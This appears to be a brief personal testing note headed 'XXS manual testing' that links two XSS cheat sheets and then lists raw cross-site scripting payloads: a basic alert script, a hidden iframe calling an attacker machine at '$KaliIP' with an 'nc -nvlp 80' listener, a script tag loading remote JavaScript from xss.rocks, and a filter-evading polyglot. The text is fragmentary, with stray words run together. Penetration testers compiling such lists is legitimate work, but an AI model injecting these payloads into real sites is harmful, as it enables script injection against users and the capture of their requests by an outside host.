XXS manual testing
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
<script>alert('XSS')</script> #careful with single quotes font <iframe src=http://$KaliIP:80/report height='0' width='0'></iframe>nc -nvlp 80
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>Last updated